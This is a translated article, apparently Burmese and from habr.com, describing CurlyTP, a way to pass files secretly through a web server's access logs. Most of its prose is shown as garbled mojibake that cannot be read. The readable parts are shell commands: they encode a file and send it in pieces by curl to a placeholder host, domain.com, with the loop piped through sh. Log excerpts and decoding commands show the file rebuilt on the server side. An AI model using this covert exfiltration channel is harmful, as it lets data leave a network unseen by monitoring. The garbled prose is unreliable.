Wikipedia á á¡áááá¹áá«ááºááœáá·áºááá¯áá»ááºá¡á dead drop ááẠáá»áŸáá¯á·ááŸááºáááºáá±áá¬ááá¯á¡áá¯á¶ážááŒá¯á áá°áá»á¬ážá¡ááŒá¬áž ááááºážá¡áá»ááºá¡ááẠáááŸááºááẠááá¯á·ááá¯áẠá¡áá»áá¯á·áá±á¬áá á¹á ááºážáá»á¬ážááᯠáááŸááºááẠá áœááºážáá±á¬ááºááá¯ááºáá±á¬ áá°ážáá±á«ááºážááŒá¶á ááºááŸá¯áá áºáá¯ááŒá áºáááºá á¡áá¯ááºáá®áá¬ááá±á¬á· áá°ááœá±áá²á· áááºáá±á¬á·á០áááœá±á·áá¯á¶ááá¯ááºáá±ááá·áº áá¯ááºáááºážáááºáááºááŸá¯áá±ážáááºážááŸá¯ááᯠááááºážááááºážáá¬ážááá¯á· ááááºážá¡áá»ááºá¡ááẠáááŸááºáá±áá¯ááºážáá«áá²á
áá¯ááºážá¡á±á¬ááºážáá±ááá·áºáá±áá¬ááẠá¡á¬áá¯á¶ááᯠáááœá²áá±á¬ááºááá·áºáá«á ááá¯á·ááŒá±á¬áá·áº á¡á±á¬á·ááºááá¯ááºážáá±á¬áááœáẠáááºážááá¯á·ááẠáá¶áá¶ááŸá á¡á¯ááºáá áºáá»ááºá á á¬ááŒáá·áºááá¯ááºá á¬á¡á¯áẠááá¯á·ááá¯áẠáá áºáááºááŸá á¡áá±á«ááºáá»á¬ážááᯠáááŒá¬áá á¡áá¯á¶ážááŒá¯ááŒáááºá
á¡ááºáá¬áááºáá±á«áºááœáẠáá¯ááºááŸááºááŒááºážááŸáá·áº á¡áááºááŸááºááŒááºážááá¯ááºáᬠáááááá¬áá»á¬ážá
áœá¬ ááŸááááºá ááá¯á·áá±á¬áº á¡ááá¯áá«áááááá¬áá»á¬ážááᯠá¡áá¯á¶ážááŒá¯ááŒááºážáá¡áá»ááºááŸá¬ á¡á¬áá¯á¶á
á°ážá
áá¯ááºááŸá¯ááᯠááœá²áá±á¬ááºáááºá ááá¯á·á¡ááŒáẠáááºážááá¯á·ááᯠáá±á¬áºááá¯áááẠááá¯á·ááá¯áẠá¡á
áá¯ážáá¡ááá·áºááœáẠááááºááá¯á·áá¬ážááá¯ááºáááºá áá¬áá¯ááºááá²?
áá±á¬á·ááºáá²áá±ážáá¬ážáá° Ryan Flowers á á
áááºáááºá
á¬ážááœááºááœá±ážáá»ááºááŸá¯áá
áºáá¯ááᯠá¡ááá¯ááŒá¯áá²á·áááº-
áááºááá·áºáááºáá¬áá¬áááᯠááá·áºá¡á¬áž ááŸááºáááºážáá²ááœáẠáááºáá±á·áá»áºáá»á¬ážáá®ážáá«ážááᯠááááºážáááºážááá¯ááºá á±ááŒá±á¬ááºáž ááœá±á·ááŸáááá«áááºá áááºážááœáá·áºááœá±á áá«ááᯠáááºááá¯áá¯á¶ážáááá²ááá¯áᬠáááá»ááºáá±áááºá
áá°á á€ááœá±ážáá»ááºááŸá¯ááᯠáá±ážáááº-
- á á¬áá¬ážááá¯áẠ(áá»áŸáá¯á·ááŸááºá á¬ááá¯) ááá¯áá°ááŒá®áž hash (md5sum) ááᯠááœááºáá»ááºáá«á
- áá»áœááºá¯ááºááá¯á· áááºážááᯠáá¯ááºáá¶áá«áẠ(gzip+uuencode)á
- áá»áœááºá¯ááºááá¯á·ááẠáá¬áá¬ááá¯á· ááááºááᬠáááŸááºáááºáá±á¬ áá±á¬ááºážááá¯áá»ááºááᯠá¡áá¯á¶ážááŒá¯á ááŸááºáááºážááá¯á· á á¬áá±ážáá«áááºá
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh
ááá¯ááºááá¯áááºáááºá áááºááẠá€áá¯ááºáá±á¬ááºááŸá¯áá»á¬ážááᯠááŒá±á¬ááºážááŒááºááŒáá·áº áá¯ááºáá±á¬ááºááẠááá¯á¡ááºáááº- ááá¯ááºááᯠáá¯ááºáá»ááºááŒá®áž áá áºááœáá·áºáá«á hash ááᯠá á áºáá±ážáá« (áááºááºáŸááᯠááœáá·áºáá¬ážáá±á¬ áá»ááºáááºáá»á¬ážá០áá¯á¶ááŒá¯á¶á áœá¬ áá°ážáá°ááá¯ááºáááº)á
áá±áá¬áááºáá»á¬ážááŒáá·áº á¡á
á¬ážááá¯ážáá¬ážáááºá =+=
áá«ááŒá±á¬áá·áº ááááºá
á¬ááŸá¬ áá±áá¬ááœááºáááŸáá¡á±á¬ááºá á
á¬áá±ážáá° CurlyTP áá¯áá±á«áºáá±á¬ áááá¯ááááºááẠá¡á®ážáá±ážáẠáá°ážááœá²áá«ááá¯ááºáá»á¬ážáá²á·ááá¯á· base64 áá¯ááºáá¶áá«ááºááᯠá¡áá¯á¶ážááŒá¯áááºá áá±á¬ááºážááá¯áá»ááºááᯠá¡áááá
áá¬ážáá¯á¶ážááŒáá·áº ááŒá¯áá¯ááºáá¬ážáááºá ?transfer?
ááá¯á·ááŸáᬠáááºáá¶áá°ááẠáááºážááᯠááŸááºáááºážáá»á¬ážááœáẠá¡ááœááºááá° ááŸá¬ááœá±ááá¯ááºáááºááŒá
áºáááºá
á€ááá á¹á ááœáẠááŸááºáááºážáá»á¬ážááœáẠá¡áááºá¡áá¬ááᯠáá»áœááºá¯ááºááá¯á·ááŒááºáááááºážá
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"
áá±á¬áºááŒáá¬ážááŒá®ážááŒá áºááá·áºá¡ááá¯ááºážá áá»áŸáá¯á·ááŸááºá á¬ááá¯áá áºá á±á¬ááºááᯠáááºáá¶áááŸáááẠáááºááẠáá¯ááºáá±á¬ááºáá»ááºáá»á¬ážááᯠá áááºááá¯ááºážááá»á á±ááẠáá¯ááºáá±á¬ááºááẠááá¯á¡ááºáááº-
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g
áá¯ááºáááºážá ááºááẠá¡ááá¯á¡áá»á±á¬ááºááœááºááẠááœááºáá°áááºá Md5sum ááá¯ááºáá®ááŸá¯áá»á¬ážá ááá¯ááºá á¡ááŒá±á¬ááºážá¡áá¬áá»á¬ážááẠá¡áá¬á¡á¬ážáá¯á¶ážááᯠááŸááºáááºá áœá¬ áá¯ááºááŸááºáá¬ážááŒá±á¬ááºáž á¡áááºááŒá¯áááºá
áááºážáááºážááẠá¡ááœááºááá¯ážááŸááºážáá«áááºá "á€áá±á·áá»áá·áºáááºážáá¡áá»ááºááŸá¬ á¡ááŒá áºáááºážáá±á¬ áááºáá±á¬ááºážááá¯ááŸá¯áá»á¬ážááŸáá áºááá·áº ááá¯ááºáá»á¬ážááᯠááœáŸá²ááŒá±á¬ááºážáá±ážááá¯ááºááŒá±á¬ááºáž áááºáá±ááŒáááºááŒá áºááŒá®áž áááºážááẠá á¬áá¬ážááŸááºáááºážáá»á¬ážááŸáááá·áº áááºááá·áºáááºáá¬áá¬ááœááºáááᯠá¡áá¯ááºáá¯ááºáá«áááºá á¡ááŒá±áá¶á¡á¬ážááŒáá·áºá áááºáá¬áá¬ááá¯ááºážááẠáá¯ááºážá¡á±á¬ááºážáá¬áá±áá¬ááŒá áºáááºâ áᯠFlowers á áá±ážáá¬ážáá²á·áááºá
áá¯ááºáá«áááºá áááºáá¶áá°ááẠáá¬áá¬ááŸááºáááºážáá»á¬ážááá¯á· áááºáá±á¬ááºááá¯ááºááŸáᬠáááºážáááºážááẠá¡áá¯ááºáá¯ááºáá«áááºá ááá¯á·áá±á¬áºá á¥ááá¬á¡á¬ážááŒáá·áº hosters á¡áá»á¬ážá¡ááŒá¬ážá ááá¯ááá¯á·áá±á¬áááºáá±á¬ááºááœáá·áºááᯠáá±ážáá«áááºá
áááºááá¯áá¯á¶ážáááá²?
Ryan Flowers á áá°ááẠááááºážá¡áá»ááºá¡ááẠáá¯á¶ááŒá¯á¶áá±ážááá¯ááºáᬠáá»áœááºážáá»ááºáá°ááá¯ááºáááᯠCurlyTP á¡ááœáẠááŒá áºááá¯ááºáá»á±ááŸááá±á¬ á¡áá¯á¶ážááŒá¯ááŸá¯á á¬áááºážááᯠááŒá¯á á¯áááºááá¯ááºááŒá±á¬ááºáž ááŒá±á¬ááŒá¬ážáá²á·áááºá áá°á·á¡ááœááºá áá»áœááºá¯ááºááá¯á· áá±á·á ááºááŒááºááœá±á·áá±áááá·áº á¡áá»áœááºážááááºááŸááá±á¬áááááá¬áá»á¬ážááᯠááá¬ážááá¯ážáá»ááá¯ááºáá±á¬áááºážáááºážááŒáá·áº á¡áá¯á¶ážááŒá¯ááá¯ááºááŒá±á¬ááºáž áááºáá±á¡áá±á¬ááºá¡áá¬ážáá áºáá¯áá»áŸáá¬ááŒá áºáááºá
á¡ááŸááºáá±á¬á·á á€áááºážáááºážááẠá¡ááŒá¬ážáá±á¬ server áá»á¬ážáá²á·ááá¯á· âhidesâ ááŒááºážááẠá¡á¬ážáá¬áá»ááºáá»á¬ážá
áœá¬ááŸááááºá
á€áááºááŸá¬ áááºáá±á¬ááºááŸá¯ááá¯ááºáá»á¬ážááŸáááá·áº áááºáá±á·áá»áºáá»á¬áž áá±ážááá¯á·ááẠáááºážáááºážáá»á¬ážáá²á០áá
áºáá¯ááŒá
áºáááºá á¡ááá·áºááŒáá·áº áá¯áá¹ááá®á¡áá»áá¯á·á áá±áá¬áá°áá¬ážáá¯á¶ááᯠáááºááŸááºááááá¯ááºáááºá
áá¬áááºáá°áá
áºáŠážááẠáá±á«ááºážá
á®ážáá»á¬áž ááá¯á·ááá¯áẠHTML áá¯ááºááᯠáááŒáá·áºáá±á¬ááŒá±á¬áá·áº web developer áá»á¬ážáᬠဠEaster ááŒááºá¥ááᯠááŒááºááá¯ááºáááºáᯠá
áááºáá°ážáá²á·áááºá
source: www.habr.com